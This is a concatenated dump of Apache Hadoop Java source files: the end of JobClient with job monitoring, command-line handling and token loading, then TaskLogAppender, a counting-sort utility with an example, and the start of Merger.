if (p.startsWith("-agentlib:hprof") || p.startsWith("-Xrunhprof")) {
hprofFound = true;
// This contains a number of comma-delimited components, one of which
// may specify the file to write to. Make sure this is present and
// not empty.
String [] subparts = p.split(",");
for (String sub : subparts) {
if (sub.startsWith("file=") && sub.length() != "file=".length()) {
fileFound = true;
}
}
}
}
return hprofFound && fileFound;
}
/**
* Monitor a job and print status in real-time as progress is made and tasks
* fail.
* @param conf the job's configuration
* @param job the job to track
* @return true if the job succeeded
* @throws IOException if communication to the JobTracker fails
*/
public boolean monitorAndPrintJob(JobConf conf,
RunningJob job
) throws IOException, InterruptedException {
String lastReport = null;
TaskStatusFilter filter;
filter = getTaskOutputFilter(conf);
JobID jobId = job.getID();
LOG.info("Running job: " + jobId);
int eventCounter = 0;
boolean profiling = conf.getProfileEnabled();
Configuration.IntegerRanges mapRanges = conf.getProfileTaskRange(true);
Configuration.IntegerRanges reduceRanges = conf.getProfileTaskRange(false);
while (!job.isComplete()) {
Thread.sleep(this.progMonitorPollIntervalMillis);
String report =
(" map " + StringUtils.formatPercent(job.mapProgress(), 0)+
" reduce " +
StringUtils.formatPercent(job.reduceProgress(), 0));
if (!report.equals(lastReport)) {
LOG.info(report);
lastReport = report;
}
TaskCompletionEvent[] events =
job.getTaskCompletionEvents(eventCounter);
eventCounter += events.length;
for(TaskCompletionEvent event : events){
TaskCompletionEvent.Status status = event.getTaskStatus();
if (profiling && shouldDownloadProfile(conf) &&
(status == TaskCompletionEvent.Status.SUCCEEDED ||
status == TaskCompletionEvent.Status.FAILED) &&
(event.isMap ? mapRanges : reduceRanges).
isIncluded(event.idWithinJob())) {
downloadProfile(event);
}
switch(filter){
case NONE:
break;
case SUCCEEDED:
if (event.getTaskStatus() ==
TaskCompletionEvent.Status.SUCCEEDED){
LOG.info(event.toString());
displayTaskLogs(event.getTaskAttemptId(), event.getTaskTrackerHttp());
}
break;
case FAILED:
if (event.getTaskStatus() ==
TaskCompletionEvent.Status.FAILED){
LOG.info(event.toString());
// Displaying the task diagnostic information
TaskAttemptID taskId = event.getTaskAttemptId();
String[] taskDiagnostics =
jobSubmitClient.getTaskDiagnostics(taskId);
if (taskDiagnostics != null) {
for(String diagnostics : taskDiagnostics){
System.err.println(diagnostics);
}
}
// Displaying the task logs
displayTaskLogs(event.getTaskAttemptId(), event.getTaskTrackerHttp());
}
break;
case KILLED:
if (event.getTaskStatus() == TaskCompletionEvent.Status.KILLED){
LOG.info(event.toString());
}
break;
case ALL:
LOG.info(event.toString());
displayTaskLogs(event.getTaskAttemptId(), event.getTaskTrackerHttp());
break;
}
}
}
LOG.info("Job complete: " + jobId);
Counters counters = null;
try{
counters = job.getCounters();
} catch(IOException ie) {
counters = null;
LOG.info(ie.getMessage());
}
if (counters != null) {
counters.log(LOG);
}
return job.isSuccessful();
}
static String getTaskLogURL(TaskAttemptID taskId, String baseUrl) {
return (baseUrl + "/tasklog?plaintext=true&attemptid=" + taskId);
}
private static void displayTaskLogs(TaskAttemptID taskId, String baseUrl)
throws IOException {
// The tasktracker for a 'failed/killed' job might not be around...
if (baseUrl != null) {
// Construct the url for the tasklogs
String taskLogUrl = getTaskLogURL(taskId, baseUrl);
      // Copy task's stdout to stdout of the JobClient
getTaskLogs(taskId, new URL(taskLogUrl+"&filter=stdout"), System.out);
// Copy task's stderr to stderr of the JobClient
getTaskLogs(taskId, new URL(taskLogUrl+"&filter=stderr"), System.err);
}
}
private static void getTaskLogs(TaskAttemptID taskId, URL taskLogUrl,
OutputStream out) {
try {
URLConnection connection = taskLogUrl.openConnection();
connection.setReadTimeout(tasklogtimeout);
connection.setConnectTimeout(tasklogtimeout);
BufferedReader input =
new BufferedReader(new InputStreamReader(connection.getInputStream()));
BufferedWriter output =
new BufferedWriter(new OutputStreamWriter(out));
try {
String logData = null;
while ((logData = input.readLine()) != null) {
if (logData.length() > 0) {
output.write(taskId + ": " + logData + "\n");
output.flush();
}
}
} finally {
input.close();
}
}catch(IOException ioe){
LOG.warn("Error reading task output" + ioe.getMessage());
}
}
static Configuration getConfiguration(String jobTrackerSpec)
{
Configuration conf = new Configuration();
if (jobTrackerSpec != null) {
if (jobTrackerSpec.indexOf(":") >= 0) {
conf.set("mapred.job.tracker", jobTrackerSpec);
} else {
String classpathFile = "hadoop-" + jobTrackerSpec + ".xml";
URL validate = conf.getResource(classpathFile);
if (validate == null) {
throw new RuntimeException(classpathFile + " not found on CLASSPATH");
}
conf.addResource(classpathFile);
}
}
return conf;
}
/**
   * Sets the output filter for tasks. Only those tasks are printed whose
   * output matches the filter.
* @param newValue task filter.
*/
@Deprecated
public void setTaskOutputFilter(TaskStatusFilter newValue){
this.taskOutputFilter = newValue;
}
/**
* Get the task output filter out of the JobConf.
*
* @param job the JobConf to examine.
* @return the filter level.
*/
public static TaskStatusFilter getTaskOutputFilter(JobConf job) {
return TaskStatusFilter.valueOf(job.get("jobclient.output.filter",
"FAILED"));
}
/**
* Modify the JobConf to set the task output filter.
*
* @param job the JobConf to modify.
* @param newValue the value to set.
*/
public static void setTaskOutputFilter(JobConf job,
TaskStatusFilter newValue) {
job.set("jobclient.output.filter", newValue.toString());
}
/**
* Returns task output filter.
* @return task filter.
*/
@Deprecated
public TaskStatusFilter getTaskOutputFilter(){
return this.taskOutputFilter;
}
private String getJobPriorityNames() {
StringBuffer sb = new StringBuffer();
for (JobPriority p : JobPriority.values()) {
sb.append(p.name()).append(" ");
}
return sb.substring(0, sb.length()-1);
}
/**
* Display usage of the command-line tool and terminate execution
*/
private void displayUsage(String cmd) {
String prefix = "Usage: JobClient ";
String jobPriorityValues = getJobPriorityNames();
String taskTypes = "map, reduce, setup, cleanup";
String taskStates = "running, completed";
if("-submit".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " <job-file>]");
} else if ("-status".equals(cmd) || "-kill".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " <job-id>]");
} else if ("-counter".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " <job-id> <group-name> <counter-name>]");
} else if ("-events".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " <job-id> <from-event-#> <#-of-events>]");
} else if ("-history".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " <jobOutputDir>]");
} else if ("-list".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " [all]]");
} else if ("-kill-task".equals(cmd) || "-fail-task".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " <task-id>]");
} else if ("-set-priority".equals(cmd)) {
System.err.println(prefix + "[" + cmd + " <job-id> <priority>]. " +
"Valid values for priorities are: "
+ jobPriorityValues);
} else if ("-list-active-trackers".equals(cmd)) {
System.err.println(prefix + "[" + cmd + "]");
} else if ("-list-blacklisted-trackers".equals(cmd)) {
System.err.println(prefix + "[" + cmd + "]");
} else if ("-list-attempt-ids".equals(cmd)) {
System.err.println(prefix + "[" + cmd +
" <job-id> <task-type> <task-state>]. " +
"Valid values for <task-type> are " + taskTypes + ". " +
"Valid values for <task-state> are " + taskStates);
} else {
System.err.printf(prefix + "<command> <args>\n");
System.err.printf("\t[-submit <job-file>]\n");
System.err.printf("\t[-status <job-id>]\n");
System.err.printf("\t[-counter <job-id> <group-name> <counter-name>]\n");
System.err.printf("\t[-kill <job-id>]\n");
System.err.printf("\t[-set-priority <job-id> <priority>]. " +
"Valid values for priorities are: " +
jobPriorityValues + "\n");
System.err.printf("\t[-events <job-id> <from-event-#> <#-of-events>]\n");
System.err.printf("\t[-history <jobOutputDir>]\n");
System.err.printf("\t[-list [all]]\n");
System.err.printf("\t[-list-active-trackers]\n");
System.err.printf("\t[-list-blacklisted-trackers]\n");
System.err.println("\t[-list-attempt-ids <job-id> <task-type> " +
"<task-state>]\n");
System.err.printf("\t[-kill-task <task-id>]\n");
System.err.printf("\t[-fail-task <task-id>]\n\n");
ToolRunner.printGenericCommandUsage(System.out);
}
}
public int run(String[] argv) throws Exception {
int exitCode = -1;
if (argv.length < 1) {
displayUsage("");
return exitCode;
}
// process arguments
String cmd = argv[0];
String submitJobFile = null;
String jobid = null;
String taskid = null;
String outputDir = null;
String counterGroupName = null;
String counterName = null;
String newPriority = null;
String taskType = null;
String taskState = null;
int fromEvent = 0;
int nEvents = 0;
boolean getStatus = false;
boolean getCounter = false;
boolean killJob = false;
boolean listEvents = false;
boolean viewHistory = false;
boolean viewAllHistory = false;
boolean listJobs = false;
boolean listAllJobs = false;
boolean listActiveTrackers = false;
boolean listBlacklistedTrackers = false;
boolean displayTasks = false;
boolean killTask = false;
boolean failTask = false;
boolean setJobPriority = false;
if ("-submit".equals(cmd)) {
if (argv.length != 2) {
displayUsage(cmd);
return exitCode;
}
submitJobFile = argv[1];
} else if ("-status".equals(cmd)) {
if (argv.length != 2) {
displayUsage(cmd);
return exitCode;
}
jobid = argv[1];
getStatus = true;
} else if("-counter".equals(cmd)) {
if (argv.length != 4) {
displayUsage(cmd);
return exitCode;
}
getCounter = true;
jobid = argv[1];
counterGroupName = argv[2];
counterName = argv[3];
} else if ("-kill".equals(cmd)) {
if (argv.length != 2) {
displayUsage(cmd);
return exitCode;
}
jobid = argv[1];
killJob = true;
} else if ("-set-priority".equals(cmd)) {
if (argv.length != 3) {
displayUsage(cmd);
return exitCode;
}
jobid = argv[1];
newPriority = argv[2];
try {
JobPriority jp = JobPriority.valueOf(newPriority);
} catch (IllegalArgumentException iae) {
displayUsage(cmd);
return exitCode;
}
setJobPriority = true;
} else if ("-events".equals(cmd)) {
if (argv.length != 4) {
displayUsage(cmd);
return exitCode;
}
jobid = argv[1];
fromEvent = Integer.parseInt(argv[2]);
nEvents = Integer.parseInt(argv[3]);
listEvents = true;
} else if ("-history".equals(cmd)) {
if (argv.length != 2 && !(argv.length == 3 && "all".equals(argv[1]))) {
displayUsage(cmd);
return exitCode;
}
viewHistory = true;
if (argv.length == 3 && "all".equals(argv[1])) {
viewAllHistory = true;
outputDir = argv[2];
} else {
outputDir = argv[1];
}
} else if ("-list".equals(cmd)) {
if (argv.length != 1 && !(argv.length == 2 && "all".equals(argv[1]))) {
displayUsage(cmd);
return exitCode;
}
if (argv.length == 2 && "all".equals(argv[1])) {
listAllJobs = true;
} else {
listJobs = true;
}
} else if("-kill-task".equals(cmd)) {
if(argv.length != 2) {
displayUsage(cmd);
return exitCode;
}
killTask = true;
taskid = argv[1];
} else if("-fail-task".equals(cmd)) {
if(argv.length != 2) {
displayUsage(cmd);
return exitCode;
}
failTask = true;
taskid = argv[1];
} else if ("-list-active-trackers".equals(cmd)) {
if (argv.length != 1) {
displayUsage(cmd);
return exitCode;
}
listActiveTrackers = true;
} else if ("-list-blacklisted-trackers".equals(cmd)) {
if (argv.length != 1) {
displayUsage(cmd);
return exitCode;
}
listBlacklistedTrackers = true;
} else if ("-list-attempt-ids".equals(cmd)) {
if (argv.length != 4) {
displayUsage(cmd);
return exitCode;
}
jobid = argv[1];
taskType = argv[2];
taskState = argv[3];
displayTasks = true;
} else {
displayUsage(cmd);
return exitCode;
}
// initialize JobClient
JobConf conf = null;
if (submitJobFile != null) {
conf = new JobConf(submitJobFile);
} else {
conf = new JobConf(getConf());
}
init(conf);
// Submit the request
try {
if (submitJobFile != null) {
RunningJob job = submitJob(conf);
System.out.println("Created job " + job.getID());
exitCode = 0;
} else if (getStatus) {
RunningJob job = getJob(JobID.forName(jobid));
if (job == null) {
System.out.println("Could not find job " + jobid);
} else {
Counters counters = job.getCounters();
System.out.println();
System.out.println(job);
if (counters != null) {
System.out.println(counters);
} else {
System.out.println("Counters not available. Job is retired.");
}
exitCode = 0;
}
} else if (getCounter) {
RunningJob job = getJob(JobID.forName(jobid));
if (job == null) {
System.out.println("Could not find job " + jobid);
} else {
Counters counters = job.getCounters();
if (counters == null) {
System.out.println("Counters not available for retired job " +
jobid);
exitCode = -1;
} else {
Group group = counters.getGroup(counterGroupName);
Counter counter = group.getCounterForName(counterName);
System.out.println(counter.getCounter());
exitCode = 0;
}
}
} else if (killJob) {
RunningJob job = getJob(JobID.forName(jobid));
if (job == null) {
System.out.println("Could not find job " + jobid);
} else {
job.killJob();
System.out.println("Killed job " + jobid);
exitCode = 0;
}
} else if (setJobPriority) {
RunningJob job = getJob(JobID.forName(jobid));
if (job == null) {
System.out.println("Could not find job " + jobid);
} else {
job.setJobPriority(newPriority);
System.out.println("Changed job priority.");
exitCode = 0;
}
} else if (viewHistory) {
viewHistory(outputDir, viewAllHistory);
exitCode = 0;
} else if (listEvents) {
listEvents(JobID.forName(jobid), fromEvent, nEvents);
exitCode = 0;
} else if (listJobs) {
listJobs();
exitCode = 0;
} else if (listAllJobs) {
listAllJobs();
exitCode = 0;
} else if (listActiveTrackers) {
listActiveTrackers();
exitCode = 0;
} else if (listBlacklistedTrackers) {
listBlacklistedTrackers();
exitCode = 0;
} else if (displayTasks) {
displayTasks(JobID.forName(jobid), taskType, taskState);
} else if(killTask) {
if(jobSubmitClient.killTask(TaskAttemptID.forName(taskid), false)) {
System.out.println("Killed task " + taskid);
exitCode = 0;
} else {
System.out.println("Could not kill task " + taskid);
exitCode = -1;
}
} else if(failTask) {
if(jobSubmitClient.killTask(TaskAttemptID.forName(taskid), true)) {
System.out.println("Killed task " + taskid + " by failing it");
exitCode = 0;
} else {
System.out.println("Could not fail task " + taskid);
exitCode = -1;
}
}
} catch (RemoteException re){
IOException unwrappedException = re.unwrapRemoteException();
if (unwrappedException instanceof AccessControlException) {
System.out.println(unwrappedException.getMessage());
} else {
throw re;
}
} finally {
close();
}
return exitCode;
}
private void viewHistory(String outputDir, boolean all)
throws IOException {
HistoryViewer historyViewer = new HistoryViewer(outputDir,
getConf(), all);
historyViewer.print();
}
/**
* List the events for the given job
* @param jobId the job id for the job's events to list
* @param fromEventId the event number to start listing from
* @param numEvents the maximum number of events to list
* @throws IOException
*/
private void listEvents(JobID jobId, int fromEventId, int numEvents)
throws IOException {
TaskCompletionEvent[] events =
jobSubmitClient.getTaskCompletionEvents(jobId, fromEventId, numEvents);
System.out.println("Task completion events for " + jobId);
System.out.println("Number of events (from " + fromEventId +
") are: " + events.length);
for(TaskCompletionEvent event: events) {
System.out.println(event.getTaskStatus() + " " + event.getTaskAttemptId() + " " +
getTaskLogURL(event.getTaskAttemptId(),
event.getTaskTrackerHttp()));
}
}
/**
* Dump a list of currently running jobs
* @throws IOException
*/
private void listJobs() throws IOException {
JobStatus[] jobs = jobsToComplete();
if (jobs == null)
jobs = new JobStatus[0];
System.out.printf("%d jobs currently running\n", jobs.length);
displayJobList(jobs);
}
/**
* Dump a list of all jobs submitted.
* @throws IOException
*/
private void listAllJobs() throws IOException {
JobStatus[] jobs = getAllJobs();
if (jobs == null)
jobs = new JobStatus[0];
System.out.printf("%d jobs submitted\n", jobs.length);
System.out.printf("States are:\n\tRunning : 1\tSucceded : 2" +
"\tFailed : 3\tPrep : 4\n");
displayJobList(jobs);
}
/**
* Display the list of active trackers
*/
private void listActiveTrackers() throws IOException {
ClusterStatus c = jobSubmitClient.getClusterStatus(true);
Collection<String> trackers = c.getActiveTrackerNames();
for (String trackerName : trackers) {
System.out.println(trackerName);
}
}
/**
* Display the list of blacklisted trackers
*/
private void listBlacklistedTrackers() throws IOException {
ClusterStatus c = jobSubmitClient.getClusterStatus(true);
Collection<String> trackers = c.getBlacklistedTrackerNames();
for (String trackerName : trackers) {
System.out.println(trackerName);
}
}
void displayJobList(JobStatus[] jobs) {
System.out.printf("JobId\tState\tStartTime\tUserName\tPriority\tSchedulingInfo\n");
for (JobStatus job : jobs) {
System.out.printf("%s\t%d\t%d\t%s\t%s\t%s\n", job.getJobID(), job.getRunState(),
job.getStartTime(), job.getUsername(),
job.getJobPriority().name(), job.getSchedulingInfo());
}
}
/**
* Get status information about the max available Maps in the cluster.
*
* @return the max available Maps in the cluster
* @throws IOException
*/
public int getDefaultMaps() throws IOException {
return getClusterStatus().getMaxMapTasks();
}
/**
* Get status information about the max available Reduces in the cluster.
*
* @return the max available Reduces in the cluster
* @throws IOException
*/
public int getDefaultReduces() throws IOException {
return getClusterStatus().getMaxReduceTasks();
}
/**
* Grab the jobtracker system directory path where job-specific files are to be placed.
*
* @return the system directory where job-specific files are to be placed.
*/
public Path getSystemDir() {
if (sysDir == null) {
sysDir = new Path(jobSubmitClient.getSystemDir());
}
return sysDir;
}
/**
* Return an array of queue information objects about all the Job Queues
* configured.
*
* @return Array of JobQueueInfo objects
* @throws IOException
*/
public JobQueueInfo[] getQueues() throws IOException {
return jobSubmitClient.getQueues();
}
/**
* Gets all the jobs which were added to a particular Job Queue
*
* @param queueName name of the Job Queue
* @return Array of jobs present in the job queue
* @throws IOException
*/
public JobStatus[] getJobsFromQueue(String queueName) throws IOException {
return jobSubmitClient.getJobsFromQueue(queueName);
}
/**
* Gets the queue information associated with a particular Job Queue
*
* @param queueName name of the job queue.
* @return Queue information associated with the particular queue.
* @throws IOException
*/
public JobQueueInfo getQueueInfo(String queueName) throws IOException {
return jobSubmitClient.getQueueInfo(queueName);
}
/**
* Gets the Queue ACLs for current user
* @return array of QueueAclsInfo object for current user.
* @throws IOException
*/
public QueueAclsInfo[] getQueueAclsForCurrentUser() throws IOException {
return jobSubmitClient.getQueueAclsForCurrentUser();
}
/** Get a delegation token for the user from the JobTracker.
* @param renewer the user who can renew the token
* @return the new token
* @throws IOException
*/
public Token<DelegationTokenIdentifier>
getDelegationToken(Text renewer) throws IOException, InterruptedException {
Token<DelegationTokenIdentifier> result =
jobSubmitClient.getDelegationToken(renewer);
InetSocketAddress addr = JobTracker.getAddress(getConf());
StringBuilder service = new StringBuilder();
service.append(NetUtils.normalizeHostName(addr.getAddress().
getHostAddress()));
service.append(':');
service.append(addr.getPort());
result.setService(new Text(service.toString()));
return result;
}
/**
* Renew a delegation token
* @param token the token to renew
* @return the new expiration time
* @throws InvalidToken
* @throws IOException
*/
public long renewDelegationToken(Token<DelegationTokenIdentifier> token)
throws InvalidToken, IOException, InterruptedException {
try {
return jobSubmitClient.renewDelegationToken(token);
} catch (RemoteException re) {
throw re.unwrapRemoteException(InvalidToken.class,
AccessControlException.class);
}
}
/**
* Cancel a delegation token from the JobTracker
* @param token the token to cancel
* @throws IOException
*/
public void cancelDelegationToken(Token<DelegationTokenIdentifier> token
) throws IOException,
InterruptedException {
try {
jobSubmitClient.cancelDelegationToken(token);
} catch (RemoteException re) {
throw re.unwrapRemoteException(InvalidToken.class,
AccessControlException.class);
}
}
/**
* Main entry point: runs the JobClient as a command-line tool.
*/
public static void main(String argv[]) throws Exception {
int res = ToolRunner.run(new JobClient(), argv);
System.exit(res);
}
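/**
* Read tokens and secret keys into the given Credentials from the files named
* by "mapreduce.job.credentials.binary" (a token storage file) and
* "mapreduce.job.credentials.json". The JSON file is expected to be a flat
* object mapping string keys to string secrets, e.g. (illustrative value only)
* {"my.secret.alias": "c2VjcmV0"}.
*/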
@SuppressWarnings("unchecked")
private void readTokensFromFiles(Configuration conf, Credentials credentials
) throws IOException {
// add tokens and secrets coming from a token storage file
String binaryTokenFilename =
conf.get("mapreduce.job.credentials.binary");
if (binaryTokenFilename != null) {
Credentials binary =
Credentials.readTokenStorageFile(new Path("file:///" +
binaryTokenFilename), conf);
credentials.addAll(binary);
}
// add secret keys coming from a json file
String tokensFileName = conf.get("mapreduce.job.credentials.json");
if(tokensFileName != null) {
LOG.info("loading user's secret keys from " + tokensFileName);
String localFileName = new Path(tokensFileName).toUri().getPath();
boolean json_error = false;
try {
// read JSON
ObjectMapper mapper = new ObjectMapper();
Map<String, String> nm =
mapper.readValue(new File(localFileName), Map.class);
for(Map.Entry<String, String> ent: nm.entrySet()) {
credentials.addSecretKey(new Text(ent.getKey()),
ent.getValue().getBytes());
}
} catch (JsonMappingException e) {
json_error = true;
} catch (JsonParseException e) {
json_error = true;
}
if(json_error)
LOG.warn("couldn't parse Token Cache JSON file with user secret keys");
}
}
//get secret keys and tokens and store them into TokenCache
@SuppressWarnings("unchecked")
private void populateTokenCache(Configuration conf, Credentials credentials)
throws IOException{
readTokensFromFiles(conf, credentials);
// add the delegation tokens from configuration
String [] nameNodes = conf.getStrings(JobContext.JOB_NAMENODES);
LOG.debug("adding the following namenodes' delegation tokens:" +
Arrays.toString(nameNodes));
if(nameNodes != null) {
Path [] ps = new Path[nameNodes.length];
for(int i=0; i< nameNodes.length; i++) {
ps[i] = new Path(nameNodes[i]);
}
TokenCache.obtainTokensForNamenodes(credentials, ps, conf);
}
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/TaskLogAppender.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import java.util.LinkedList;
import java.util.Queue;
import org.apache.log4j.FileAppender;
import org.apache.log4j.spi.LoggingEvent;
/**
* A simple log4j-appender for the task child's
* map-reduce system logs.
*
*/
public class TaskLogAppender extends FileAppender {
private String taskId; //taskId should be managed as a String rather than a TaskID object
//so that log4j can configure it from the configuration (log4j.properties).
private Integer maxEvents;
private Queue<LoggingEvent> tail = null;
private Boolean isCleanup;
private String logFileName;
// System properties passed in from JVM runner
static final String ISCLEANUP_PROPERTY = "hadoop.tasklog.iscleanup";
static final String LOGSIZE_PROPERTY = "hadoop.tasklog.totalLogFileSize";
static final String TASKID_PROPERTY = "hadoop.tasklog.taskid";
static final String LOG_FILE_NAME = "hadoop.tasklog.file.name";
@Override
public void activateOptions() {
synchronized (this) {
setOptionsFromSystemProperties();
if (maxEvents > 0) {
tail = new LinkedList<LoggingEvent>();
}
if(logFileName == null)
setFile(TaskLog.getTaskLogFile(TaskAttemptID.forName(taskId),
isCleanup, TaskLog.LogName.SYSLOG).toString());
else
setFile(logFileName);
setAppend(true);
super.activateOptions();
}
}
/**
* The Task Runner passes in the options as system properties. Set
* the options if the setters haven't already been called.
*/
private synchronized void setOptionsFromSystemProperties() {
if (isCleanup == null) {
String propValue = System.getProperty(ISCLEANUP_PROPERTY, "false");
isCleanup = Boolean.valueOf(propValue);
}
if (taskId == null) {
taskId = System.getProperty(TASKID_PROPERTY);
}
if (maxEvents == null) {
String propValue = System.getProperty(LOGSIZE_PROPERTY, "100");
setTotalLogFileSize(Long.valueOf(propValue));
}
if(logFileName == null) {
logFileName = System.getProperty(LOG_FILE_NAME);
}
}
@Override
public void append(LoggingEvent event) {
synchronized (this) {
if (tail == null) {
super.append(event);
} else {
if (tail.size() >= maxEvents) {
tail.remove();
}
tail.add(event);
}
}
}
public void flush() {
qw.flush();
}
@Override
public synchronized void close() {
if (tail != null) {
for(LoggingEvent event: tail) {
super.append(event);
}
}
super.close();
}
/**
* Getter/Setter methods for log4j.
*/
public synchronized String getTaskId() {
return taskId;
}
public synchronized void setTaskId(String taskId) {
this.taskId = taskId;
}
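// Rough per-event size in bytes (an assumed average) used to convert the
// configured total log size into a bounded number of retained events.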
private static final int EVENT_SIZE = 100;
public synchronized long getTotalLogFileSize() {
return maxEvents * EVENT_SIZE;
}
public synchronized void setTotalLogFileSize(long logSize) {
maxEvents = (int) (logSize / EVENT_SIZE);
}
/**
* Set whether the task is a cleanup attempt or not.
*
* @param isCleanup
* true if the task is cleanup attempt, false otherwise.
*/
public synchronized void setIsCleanup(boolean isCleanup) {
this.isCleanup = isCleanup;
}
/**
* Get whether task is cleanup attempt or not.
*
* @return true if the task is cleanup attempt, false otherwise.
*/
public synchronized boolean getIsCleanup() {
return isCleanup;
}
}
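/*
 * Illustrative sketch (not part of the original source): a TaskLogAppender is
 * typically wired up through log4j.properties along these lines, with the
 * concrete values supplied as system properties by the task JVM runner.
 * The exact property names below are an assumption for illustration.
 *
 *   log4j.appender.TLA=org.apache.hadoop.mapred.TaskLogAppender
 *   log4j.appender.TLA.taskId=${hadoop.tasklog.taskid}
 *   log4j.appender.TLA.isCleanup=${hadoop.tasklog.iscleanup}
 *   log4j.appender.TLA.totalLogFileSize=${hadoop.tasklog.totalLogFileSize}
 *   log4j.appender.TLA.layout=org.apache.log4j.PatternLayout
 *   log4j.appender.TLA.layout.ConversionPattern=%d{ISO8601} %p %c: %m%n
 */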
<|start_filename|>src/core/org/apache/hadoop/util/IndexedCountingSortable.java<|end_filename|>
package org.apache.hadoop.util;
/**
* Linear-time, in-place counting sort.
*/
public abstract class IndexedCountingSortable
{
abstract public int getKey(int i);
abstract public int get(int i);
abstract public void put(int i, int v);
final int[] counts;
final int[] starts;
final int total;
public IndexedCountingSortable(int[] counts, int total)
{
this.total = total;
this.counts = counts;
this.starts = new int[counts.length+1];
for (int i = 1; i < counts.length+1; i++)
{
starts[i] = starts[i - 1] + counts[i - 1];
}
System.out.println("starts[counts.length - 1] + counts[counts.length - 1] ="+
(starts[counts.length - 1] + counts[counts.length - 1])+",total =" +total);
assert (starts[counts.length - 1] + counts[counts.length - 1] == total);
}
public void sort()
{
int[] dest = new int[total];
for (int i = 0; i < total; i++)
{
int p = getKey(i);
dest[starts[p]++] = get(i);
}
for (int i = 0; i < total; i++)
{
put(i, dest[i]);
}
}
private int findSwapPosition(int partition)
{
while (counts[partition] > 0)
{
counts[partition]--;
int pos = starts[partition] + counts[partition];
int part = getKey(pos);
if (part != partition)
{
return part;
}
}
return -1;
}
public void sortInplace()
{
for (int i = 0; i < counts.length; i++)
{
while (true)
{
int part = findSwapPosition(i);
if (part < 0)
{
break;
}
int hole = starts[i] + counts[i];
int tempOffset = get(hole);
while (true)
{
int next = findSwapPosition(part);
int pos = starts[part] + counts[part];
int temp = get(pos);
put(pos, tempOffset);
tempOffset = temp;
if (i == next)
{
put(hole, tempOffset);
break;
}
part = next;
}
}
}
}
}
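/*
 * Illustrative usage sketch (not part of the original source): a minimal
 * concrete subclass that buckets integers by value / 10. The counts array
 * must already hold the number of records per key, and getKey(i) is derived
 * from the record currently stored at position i so that sortInplace() stays
 * consistent while records are swapped. Class and variable names here are
 * made up for the example.
 */
class IndexedCountingSortableExample
{
  public static void main(String[] args)
  {
    final int[] data = {42, 7, 18, 3, 25, 11, 39};
    final int numKeys = 5; // keys 0..4 cover values 0..49
    int[] counts = new int[numKeys];
    for (int v : data)
    {
      counts[v / 10]++; // per-key record counts, required by the constructor
    }
    IndexedCountingSortable sorter = new IndexedCountingSortable(counts, data.length)
    {
      public int getKey(int i) { return data[i] / 10; }
      public int get(int i) { return data[i]; }
      public void put(int i, int v) { data[i] = v; }
    };
    sorter.sort(); // sortInplace() would produce the same grouping without the temp array
    // prints [7, 3, 18, 11, 25, 39, 42] -- records grouped by key in ascending key order
    System.out.println(java.util.Arrays.toString(data));
  }
}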
<|start_filename|>src/mapred/org/apache/hadoop/mapred/Merger.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.ChecksumFileSystem;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.LocalDirAllocator;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.io.DataInputBuffer;
import org.apache.hadoop.io.RawComparator;
import org.apache.hadoop.io.compress.CompressionCodec;
import org.apache.hadoop.mapred.IFile.Writer;
import org.apache.hadoop.util.PriorityQueue;
import org.apache.hadoop.util.Progress;
import org.apache.hadoop.util.Progressable;
public class Merger {
private static final Log LOG = LogFactory.getLog(Merger.class);
// Local directories
private static LocalDirAllocator lDirAlloc = new LocalDirAllocator(
"mapred.local.dir");
public static <K extends Object, V extends Object> RawKeyValueIterator merge(
Configuration conf,
FileSystem fs,
Class<K> keyClass,
Class<V> valueClass,
CompressionCodec codec,
Path[] inputs,
boolean deleteInputs,
int mergeFactor,
Path tmpDir,
RawComparator<K> comparator,
Progressable reporter,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
return new MergeQueue<K, V>(conf, fs, inputs, deleteInputs, codec,
comparator, reporter, null).merge(keyClass, valueClass, mergeFactor,
tmpDir, readsCounter, writesCounter, mergePhase);
}
public static <K extends Object, V extends Object> RawKeyValueIterator merge(
Configuration conf,
FileSystem fs,
Class<K> keyClass,
Class<V> valueClass,
CompressionCodec codec,
Path[] inputs,
boolean deleteInputs,
int mergeFactor,
Path tmpDir,
RawComparator<K> comparator,
Progressable reporter,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Counters.Counter mergedMapOutputsCounter,
Progress mergePhase) throws IOException {
return new MergeQueue<K, V>(conf, fs, inputs, deleteInputs, codec,
comparator, reporter, mergedMapOutputsCounter).merge(keyClass,
valueClass, mergeFactor, tmpDir, readsCounter, writesCounter,
mergePhase);
}
public static <K extends Object, V extends Object> RawKeyValueIterator merge(
Configuration conf,
FileSystem fs,
Class<K> keyClass,
Class<V> valueClass,
